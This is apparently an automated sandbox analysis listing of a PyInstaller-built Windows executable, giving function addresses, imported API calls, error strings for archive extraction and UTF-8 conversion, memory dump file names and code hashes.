String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: 35c5a7742de5d5ed4849e394d6fdac3950876f92fb0a8ea3b9b0d7670df73e74
Instruction ID: 591cb8f53ac070da6805944cbea1b8f62923ad2ff3549888cb2ecaeffc6fed06
Opcode Fuzzy Hash: 35c5a7742de5d5ed4849e394d6fdac3950876f92fb0a8ea3b9b0d7670df73e74
Instruction Fuzzy Hash: C751A575E08E8245EA649B21A9506FAE394AF46FE8F504131EE4DC7B89FE7CE5418380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3223F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF61D32241B
SelectObject.GDI32 ref: 00007FF61D322462
DrawTextW.USER32 ref: 00007FF61D322485
SelectObject.GDI32 ref: 00007FF61D32249B
ReleaseDC.USER32 ref: 00007FF61D3224AB
MoveWindow.USER32 ref: 00007FF61D3224FB
MoveWindow.USER32 ref: 00007FF61D32253B
MoveWindow.USER32 ref: 00007FF61D32258E
MoveWindow.USER32 ref: 00007FF61D3225D6

Strings

P%, xrefs: 00007FF61D32246F

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction ID: 32b69c15069fda3e1cb61a297d1bcfb0c7f73609eb99018473384e4fa7480216
Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction Fuzzy Hash: C751E336614BA186D6389F36A4581BAB7A1FB99B75F004131EBCE83794EF3CD085DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3368A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3368E7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D336CD4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D336F70

Strings

p, xrefs: 00007FF61D336A11
:, xrefs: 00007FF61D336AA0
f, xrefs: 00007FF61D336A09
-, xrefs: 00007FF61D33697D
p, xrefs: 00007FF61D336999

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
Instruction ID: cb678554d80d9f987fe5566c5b7d34c3b5cd69727c3d6d5a3ac0e82d601fb8be
Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
Instruction Fuzzy Hash: 5212A472E0C943AAFB20EB14D354679F661EB42F64F984135E689876C4EF3DE484EB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D331208 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D331248
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D331610
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3318AF

Strings

f, xrefs: 00007FF61D33134A
f, xrefs: 00007FF61D3312E0
p, xrefs: 00007FF61D3312ED
f, xrefs: 00007FF61D331495
p, xrefs: 00007FF61D331352

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction ID: afae3c7b619ab4573092ec32a6e015a41ec52c0c1bdcbe35337de91586c8ce1c
Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction Fuzzy Hash: E912B972E0CA43A6FB24DB15D2442BAF271FB42F70F884235D69A866C4EF7CE4508B54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3215A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

malloc, xrefs: 00007FF61D321640
fseek, xrefs: 00007FF61D321610
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF61D3216C2
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF61D321609
fread, xrefs: 00007FF61D3216C9
Failed to extract %s: failed to open archive file!, xrefs: 00007FF61D3215D3
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF61D321639

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 9bc86620ee487ce21f5b89473777ec4549ed41894a2ed8362a4f7e3270b7e078
Instruction ID: 7b09c7f437e1a20cc14a74ba1f9021bbe2589f5576f5feb8021f789d745c4b59
Opcode Fuzzy Hash: 9bc86620ee487ce21f5b89473777ec4549ed41894a2ed8362a4f7e3270b7e078
Instruction Fuzzy Hash: 5B319335F08E4396EA24DB61A9405BAE3A0EF06FE8F584131DE4D87A95FE3DE5418780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32EC00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF61D32EC5D

Part of subcall function 00007FF61D32FB70: __GetUnwindTryBlock.LIBCMT ref: 00007FF61D32FBB3
Part of subcall function 00007FF61D32FB70: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF61D32FBD8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF61D32ED35
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF61D32EF8A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF61D32F096

Strings

csm, xrefs: 00007FF61D32EC77
csm, xrefs: 00007FF61D32ECDE
csm, xrefs: 00007FF61D32ED58

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
Instruction ID: 66b9b68cbe0df2b36663fc039a444ff4c45605fe9e3e8b9cde98453f8d2e3308
Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
Instruction Fuzzy Hash: A1E17F73E08B418AEB209B3594412ADB7A0FB56BACF144535EE4D97B59EF38E180C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3287B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D328847
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D32889E

Strings

win32_utils_to_utf8, xrefs: 00007FF61D3288D6
Failed to encode wchar_t as UTF-8., xrefs: 00007FF61D3288C6
WideCharToMultiByte, xrefs: 00007FF61D3288E6
Failed to get UTF-8 buffer size., xrefs: 00007FF61D3288DF
Out of memory., xrefs: 00007FF61D3288CF

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
Instruction ID: b1e8324014076e568ed06514d40307947c06b6cef12b7dcdd281c38065ecb76b
Opcode Fuzzy Hash: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
Instruction Fuzzy Hash: 30417432A09F4282E660CF25B84017AF7A1FB46BA4F544135EA8D87B95EF3DD455C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328CF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D328D31

Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0

WideCharToMultiByte.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D328DA5

Strings

win32_utils_to_utf8, xrefs: 00007FF61D328D72
Failed to encode wchar_t as UTF-8., xrefs: 00007FF61D328DAF
WideCharToMultiByte, xrefs: 00007FF61D328D45, 00007FF61D328DB6
Failed to get UTF-8 buffer size., xrefs: 00007FF61D328D3E
Out of memory., xrefs: 00007FF61D328D6B

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
Instruction ID: 0e502a9605c8b65732c7bc038552c514b8da8c22927c1512d1ccb67cc3d28537
Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
Instruction Fuzzy Hash: F5217C35B0AF4285EB109F26B840179B661AF96FA4B544636DA4D83BA4FF3CE5058380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3275B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF61D327726

Part of subcall function 00007FF61D330350: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D330364

Part of subcall function 00007FF61D330324: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D330338

Strings

%s%c%s, xrefs: 00007FF61D3275F5
WARNING: file already exists but should not: %s, xrefs: 00007FF61D3276A8
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF61D327642
ERROR: file already exists but should not: %s, xrefs: 00007FF61D32768C
\, xrefs: 00007FF61D3275FC

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
Instruction ID: 7b3e9532cf9b5f3661f87d59d8e5813483cd292733324d76e03de014d6a1c64e
Opcode Fuzzy Hash: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
Instruction Fuzzy Hash: 75515EB1E0DE5345FE65AB39AA512B9D291AF46FB8F444131E90DC76D6FF6CE4008380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32DEB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DF3D
GetLastError.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DF4B
LoadLibraryExW.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DF75
FreeLibrary.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DFBB
GetProcAddress.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DFC7

Strings

api-ms-, xrefs: 00007FF61D32DF5D

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
Instruction ID: 9db77ed2686f2e88a3ca649f23db27a209cf3411e1ad7830a3847c2537ff685f
Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
Instruction Fuzzy Hash: B631E232E1AE42A4FE159B26B844575A394BF4AFB8F1A0534DE1D8B380FF3CE4558384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D327430 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF61D3279B1,00000000,?,00000000,00000000,?,00007FF61D32154F), ref: 00007FF61D32748F

Part of subcall function 00007FF61D322B30: MessageBoxW.USER32 ref: 00007FF61D322C05

Strings

LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF61D3274EA
LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF61D3274A3
LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF61D327466

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
Instruction ID: cb538d50eb12c0818190f6301c28590e2dfac907ebf2b7ed4af3edbd85d8427d
Opcode Fuzzy Hash: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
Instruction Fuzzy Hash: 3D31B371F18F8241FE25EB35A9553BAD291BF8AFE4F440431DA4EC2696FF6CE1048680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328BE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328CA0

Strings

MultiByteToWideChar, xrefs: 00007FF61D328C2E, 00007FF61D328CB1
Failed to decode wchar_t from UTF-8, xrefs: 00007FF61D328CAA
win32_utils_from_utf8, xrefs: 00007FF61D328C69
Out of memory., xrefs: 00007FF61D328C62
Failed to get wchar_t buffer size., xrefs: 00007FF61D328C27

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
Instruction ID: a2e8140deb60278e39c8e741a7b3732636b20d258c8cb154402682abd1e768c7
Opcode Fuzzy Hash: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
Instruction Fuzzy Hash: 60216736B09E4281EB50DB29F840066E361FF86BE8B584536DB5CC3B69FF2DD5518740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33B810 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF61D33B81F
FlsGetValue.KERNEL32 ref: 00007FF61D33B834
FlsSetValue.KERNEL32 ref: 00007FF61D33B855
FlsSetValue.KERNEL32 ref: 00007FF61D33B882
FlsSetValue.KERNEL32 ref: 00007FF61D33B893
FlsSetValue.KERNEL32 ref: 00007FF61D33B8A4
SetLastError.KERNEL32 ref: 00007FF61D33B8BF

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a629ec038ee8b1bdf0b034613ecccd0bd1996640db7e8bb071e29d93dcaf093c
Instruction ID: 7158d907b49a82267e26a4a495ba8abdec63bce05136d2595cc8bd0b1177547f
Opcode Fuzzy Hash: a629ec038ee8b1bdf0b034613ecccd0bd1996640db7e8bb071e29d93dcaf093c
Instruction Fuzzy Hash: 10215B31E0CE86A2FA6CE3719751139E2425F46FB0F544634D93ECAAD6FE2CE4018340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3486BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF61D3486ED
GetLastError.KERNEL32 ref: 00007FF61D3486F9
CloseHandle.KERNEL32 ref: 00007FF61D348711
CreateFileW.KERNEL32 ref: 00007FF61D34873C
WriteConsoleW.KERNEL32 ref: 00007FF61D34875B

Strings

CONOUT$, xrefs: 00007FF61D34871D

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
Instruction ID: 2789e92f516b9fed4900b4f391c9da9eb7a1c60c978f12532db758cbb616d344
Opcode Fuzzy Hash: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
Instruction Fuzzy Hash: 69114C31A18E4286E7508F56A854329B6A0FB89FF5F044234EA6DC77A4EF7DD844C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33B988 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33B997
FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33B9CD
FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33B9FA
FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33BA0B
FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33BA1C
SetLastError.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33BA37

Memory Dump Source

